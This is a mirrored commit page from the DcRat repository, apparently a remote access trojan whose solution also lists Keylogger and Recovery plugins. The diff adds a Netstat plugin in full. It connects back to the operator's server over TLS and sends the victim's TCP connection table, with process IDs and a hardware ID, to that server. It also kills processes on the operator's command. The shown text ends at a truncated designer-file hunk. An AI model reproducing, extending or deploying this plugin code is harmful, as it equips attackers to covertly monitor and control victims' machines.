qwqdanchun
/
DcRat
mirror of https://github.com/qwqdanchun/DcRat.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Add netstat

This commit is contained in:
qwqdanchun 2021-04-04 22:25:52 +08:00
parent b5a6248eb9
commit d3c9b3cc1b
22 changed files with 2441 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
DcRat.sln
View File

@ -47,6 +47,8 @@ Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Recovery", "Plugin\Recovery
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Keylogger", "Plugin\Keylogger\Keylogger\Keylogger.csproj", "{5D01A326-0357-4C3F-A196-3B8B866C9613}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Netstat", "Plugin\Netstat\Netstat\Netstat.csproj", "{EFFE3048-E904-48FD-B8C0-290E8E9290FB}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@ -223,6 +225,14 @@ Global
{5D01A326-0357-4C3F-A196-3B8B866C9613}.Release|Any CPU.Build.0 = Release|Any CPU
{5D01A326-0357-4C3F-A196-3B8B866C9613}.Release|x86.ActiveCfg = Release|Any CPU
{5D01A326-0357-4C3F-A196-3B8B866C9613}.Release|x86.Build.0 = Release|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Debug|x86.ActiveCfg = Debug|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Debug|x86.Build.0 = Debug|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|Any CPU.Build.0 = Release|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|x86.ActiveCfg = Release|Any CPU
{EFFE3048-E904-48FD-B8C0-290E8E9290FB}.Release|x86.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
@ -246,6 +256,7 @@ Global
{378FC1AA-37BD-4C61-B5DE-4E45C2CDB8C9} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{8BFC8ED2-71CC-49DC-9020-2C8199BC27B6} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{5D01A326-0357-4C3F-A196-3B8B866C9613} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
{EFFE3048-E904-48FD-B8C0-290E8E9290FB} = {0DE8DA5D-061D-4649-8A56-48729CF1F789}
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1C926148-C492-48B3-8F82-7EBB235A9866}

25
Plugin/Netstat/Netstat.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29123.88
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Netstat", "Netstat\Netstat.csproj", "{1fe221b4-ccfa-4982-b6cb-f5b8d70757c8}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1fe221b4-ccfa-4982-b6cb-f5b8d70757c8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{1fe221b4-ccfa-4982-b6cb-f5b8d70757c8}.Debug|Any CPU.Build.0 = Debug|Any CPU
{1fe221b4-ccfa-4982-b6cb-f5b8d70757c8}.Release|Any CPU.ActiveCfg = Release|Any CPU
{1fe221b4-ccfa-4982-b6cb-f5b8d70757c8}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {C9F86219-B52B-4BDB-AE41-C0B5E74ADC63}
EndGlobalSection
EndGlobal

220
Plugin/Netstat/Netstat/Connection.cs Normal file
View File

@ -0,0 +1,220 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient()
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
new HandleNetstat().NetstatList();
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
GC.Collect();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
return;
}
}
catch
{
IsConnected = false;
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
}
}
}
else
{
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

3
Plugin/Netstat/Netstat/FodyWeavers.xml Normal file
View File

@ -0,0 +1,3 @@
<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd">
<Costura />
</Weavers>

111
Plugin/Netstat/Netstat/FodyWeavers.xsd Normal file
View File

@ -0,0 +1,111 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
<xs:element name="Weavers">
<xs:complexType>
<xs:all>
<xs:element name="Costura" minOccurs="0" maxOccurs="1">
<xs:complexType>
<xs:all>
<xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
<xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
</xs:annotation>
</xs:element>
</xs:all>
<xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
<xs:annotation>
<xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCompression" type="xs:boolean">
<xs:annotation>
<xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="DisableCleanup" type="xs:boolean">
<xs:annotation>
<xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="LoadAtModuleInit" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
<xs:annotation>
<xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="ExcludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="IncludeAssemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged32Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="Unmanaged64Assemblies" type="xs:string">
<xs:annotation>
<xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="PreloadOrder" type="xs:string">
<xs:annotation>
<xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:all>
<xs:attribute name="VerifyAssembly" type="xs:boolean">
<xs:annotation>
<xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="VerifyIgnoreCodes" type="xs:string">
<xs:annotation>
<xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
</xs:annotation>
</xs:attribute>
<xs:attribute name="GenerateXsd" type="xs:boolean">
<xs:annotation>
<xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
</xs:annotation>
</xs:attribute>
</xs:complexType>
</xs:element>
</xs:schema>

143
Plugin/Netstat/Netstat/Handler/TcpConnectionTableHelper.cs Normal file
View File

@ -0,0 +1,143 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Plugin.Handler
{
public class TcpConnectionTableHelper
{
[DllImport("Ws2_32.dll")]
static extern ushort ntohs(ushort netshort);
[DllImport("iphlpapi.dll", SetLastError = true)]
static extern uint GetExtendedTcpTable(IntPtr pTcpTable, ref int dwOutBufLen, bool sort, int ipVersion, TCP_TABLE_TYPE tblClass, int reserved);
[StructLayout(LayoutKind.Sequential)]
public struct MIB_TCPROW_OWNER_PID
{
public uint state;
public uint localAddr;
public byte localPort1;
public byte localPort2;
public byte localPort3;
public byte localPort4;
public uint remoteAddr;
public byte remotePort1;
public byte remotePort2;
public byte remotePort3;
public byte remotePort4;
public int owningPid;
public ushort LocalPort
{
get
{
return BitConverter.ToUInt16(new byte[2] { localPort2, localPort1 }, 0);
}
}
public ushort RemotePort
{
get
{
return BitConverter.ToUInt16(new byte[2] { remotePort2, remotePort1 }, 0);
}
}
}
[StructLayout(LayoutKind.Sequential)]
public struct MIB_TCPTABLE_OWNER_PID
{
public uint dwNumEntries;
MIB_TCPROW_OWNER_PID table;
}
public static string GetIpAddress(long ipAddrs)
{
try
{
System.Net.IPAddress ipAddress = new System.Net.IPAddress(ipAddrs);
return ipAddress.ToString();
}
catch { return ipAddrs.ToString(); }
}
public static ushort GetTcpPort(int tcpPort)
{
return ntohs((ushort)tcpPort);
}
public static MIB_TCPROW_OWNER_PID[] GetAllTcpConnections()
{
MIB_TCPROW_OWNER_PID[] tcpConnectionRows;
int AF_INET = 2; // IPv4
int buffSize = 0;
// use WinAPI GetExtendedTcpTable to query all active tcp connection information
uint ret = GetExtendedTcpTable(IntPtr.Zero, ref buffSize, true, AF_INET, TCP_TABLE_TYPE.TCP_TABLE_OWNER_PID_ALL, 0);
if (ret != 0 && ret != 122) // 122 means insufficient buffer size
{
throw new Exception("Error occurred when trying to query tcp table, return code: " + ret);
}
IntPtr buffTable = Marshal.AllocHGlobal(buffSize);
try
{
ret = GetExtendedTcpTable(buffTable, ref buffSize, true, AF_INET, TCP_TABLE_TYPE.TCP_TABLE_OWNER_PID_ALL, 0);
if (ret != 0)
{
throw new Exception("Error occurred when trying to query tcp table, return code: " + ret);
}
// get the number of entries in the table
MIB_TCPTABLE_OWNER_PID table = (MIB_TCPTABLE_OWNER_PID)Marshal.PtrToStructure(buffTable, typeof(MIB_TCPTABLE_OWNER_PID));
IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(table.dwNumEntries));
tcpConnectionRows = new MIB_TCPROW_OWNER_PID[table.dwNumEntries];
for (int i = 0; i < table.dwNumEntries; i++)
{
MIB_TCPROW_OWNER_PID tcpRow = (MIB_TCPROW_OWNER_PID)Marshal.PtrToStructure(rowPtr, typeof(MIB_TCPROW_OWNER_PID));
tcpConnectionRows[i] = tcpRow;
rowPtr = (IntPtr)((long)rowPtr + Marshal.SizeOf(tcpRow));
}
}
finally
{
// free memory
Marshal.FreeHGlobal(buffTable);
}
return tcpConnectionRows;
}
}
}
public enum TCP_TABLE_TYPE : int
{
TCP_TABLE_BASIC_LISTENER,
TCP_TABLE_BASIC_CONNECTIONS,
TCP_TABLE_BASIC_ALL,
TCP_TABLE_OWNER_PID_LISTENER,
TCP_TABLE_OWNER_PID_CONNECTIONS,
TCP_TABLE_OWNER_PID_ALL,
TCP_TABLE_OWNER_MODULE_LISTENER,
TCP_TABLE_OWNER_MODULE_CONNECTIONS,
TCP_TABLE_OWNER_MODULE_ALL
}
public enum TCP_CONNECTION_STATE : int
{
CLOSED = 1,
LISTENING,
SYN_SENT,
SYN_RCVD,
ESTABLISHED,
FIN_WAIT_1,
FIN_WAIT_2,
CLOSE_WAIT,
CLOSING,
LAST_ACK,
TIME_WAIT,
DELETE_TCP
};

67
Plugin/Netstat/Netstat/ILMerge.props Normal file
View File

@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo></ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>

4
Plugin/Netstat/Netstat/ILMergeOrder.txt Normal file
View File

@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction

79
Plugin/Netstat/Netstat/Netstat.csproj Normal file
View File

@ -0,0 +1,79 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EFFE3048-E904-48FD-B8C0-290E8E9290FB}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>Netstat</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<PlatformTarget>AnyCPU</PlatformTarget>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Connection.cs" />
<Compile Include="Handler\TcpConnectionTableHelper.cs" />
<Compile Include="Packet.cs" />
<Compile Include="Plugin.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>

95
Plugin/Netstat/Netstat/Packet.cs Normal file
View File

@ -0,0 +1,95 @@
using MessagePackLib.MessagePack;
using Plugin.Handler;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Management;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Packet
{
public static void Read(object data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "Netstat":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "List":
{
new HandleNetstat().NetstatList();
break;
}
case "Kill":
{
new HandleNetstat().Kill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
break;
}
}
}
break;
}
}
}
public class HandleNetstat
{
public void Kill(int ID)
{
foreach (var process in Process.GetProcesses())
{
try
{
if (process.Id == ID)
{
process.Kill();
}
}
catch { };
}
NetstatList();
}
public void NetstatList()
{
try
{
StringBuilder sb = new StringBuilder();
TcpConnectionTableHelper.MIB_TCPROW_OWNER_PID[] tcpProgressInfoTable = TcpConnectionTableHelper.GetAllTcpConnections();
int tableRowCount = tcpProgressInfoTable.Length;
for (int i = 0; i < tableRowCount; i++)
{
TcpConnectionTableHelper.MIB_TCPROW_OWNER_PID row = tcpProgressInfoTable[i];
string source = string.Format("{0}:{1}", TcpConnectionTableHelper.GetIpAddress(row.localAddr), row.LocalPort);
string dest = string.Format("{0}:{1}", TcpConnectionTableHelper.GetIpAddress(row.remoteAddr), row.RemotePort);
sb.Append(row.owningPid + "-=>" + source + "-=>" + dest + "-=>" + (TCP_CONNECTION_STATE)row.state + "-=>");
}
Debug.WriteLine(sb);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "netstat";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("Message").AsString = sb.ToString();
Connection.Send(msgpack.Encode2Bytes());
}
catch { }
}
}
}

33
Plugin/Netstat/Netstat/Plugin.cs Normal file
View File

@ -0,0 +1,33 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bsod, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;
new Thread(() =>
{
Connection.InitializeClient();
}).Start();
while (Connection.IsConnected)
{
Thread.Sleep(1000);
}
}
}
}

36
Plugin/Netstat/Netstat/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
//[assembly: Guid("d640c36b-2c66-449b-a145-eb98322a67c8")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.4.0")]
[assembly: AssemblyFileVersion("1.0.4.0")]

5
Plugin/Netstat/Netstat/packages.config Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
</packages>

3
Plugin/ProcessManager/ProcessManager/Packet.cs
View File

@ -36,9 +36,10 @@ namespace Plugin
new HandleProcessManager().ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
break;
}
}
}
}
break;
}
}
}

42
Server/Forms/Form1.Designer.cs generated
View File

@ -99,6 +99,7 @@
